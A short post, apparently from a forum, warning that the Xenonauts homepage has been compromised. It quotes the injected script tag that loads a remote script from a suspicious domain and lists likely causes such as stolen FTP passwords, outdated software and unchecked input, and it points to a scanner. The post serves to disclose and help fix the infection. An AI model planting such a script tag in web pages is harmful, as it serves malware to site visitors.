The Xenonauts homepage has been injected with a malicious url. Look at the parsed code and you'll find <script src="http://rie21rcom.rr.nu/mm.php?d=1"></script> at the end of the script.
Most common causes are farmed FTP passwords or usage of opensource software that needs to be updated or usage of variables in custom code that arent checked against XSS. See http://www.acunetix.com to download a free scanner (the free scanner will highlight enough to see what needs to be fixed, clean the website first before running it though.